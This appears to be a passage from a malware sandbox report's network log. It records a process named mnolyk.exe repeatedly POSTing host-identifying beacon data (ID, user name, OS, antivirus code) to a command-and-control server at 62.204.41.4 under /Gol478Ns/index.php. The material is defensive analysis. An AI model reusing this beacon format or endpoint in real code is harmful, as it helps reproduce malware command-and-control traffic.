133	192.168.2.5	49841	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:41.479214907 CET	338	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:41.545325994 CET	338	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.5	49842	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:41.717333078 CET	339	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:41.781707048 CET	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.5	49843	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:41.966114998 CET	340	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:42.031290054 CET	340	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.5	49844	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:42.215375900 CET	341	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:42.280846119 CET	341	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.5	49845	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:42.455704927 CET	342	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:42.518126011 CET	342	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.5	49846	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:42.696964979 CET	343	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:42.759289026 CET	343	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.5	49847	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:43.302253962 CET	344	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:43.365643024 CET	344	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49711	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:09.336515903 CET	110	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:09.399925947 CET	110	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.5	49848	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:43.671761990 CET	345	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:43.736843109 CET	345	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.5	49849	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:43.984219074 CET	346	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:44.050056934 CET	346	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.5	49850	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:44.320306063 CET	347	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:44.384305000 CET	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.5	49851	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:45.497081995 CET	348	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:45.563458920 CET	348	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.5	49852	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:46.015162945 CET	349	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:46.079853058 CET	349	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.5	49853	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:47.844021082 CET	350	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:47.910370111 CET	350	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.5	49854	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:48.147586107 CET	351	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:48.211539030 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.5	49855	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:48.404553890 CET	352	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:48.469326973 CET	352	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.5	49856	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:48.633799076 CET	353	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:48.696414948 CET	353	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.5	49857	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:48.874537945 CET	354	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:48.938997984 CET	354	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49712	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:09.572155952 CET	111	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:09.637331009 CET	111	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.5	49858	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:49.109184980 CET	355	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:49.176765919 CET	355	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.5	49859	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:49.355360985 CET	356	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:49.419018030 CET	356	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.5	49860	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:49.596112013 CET	357	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
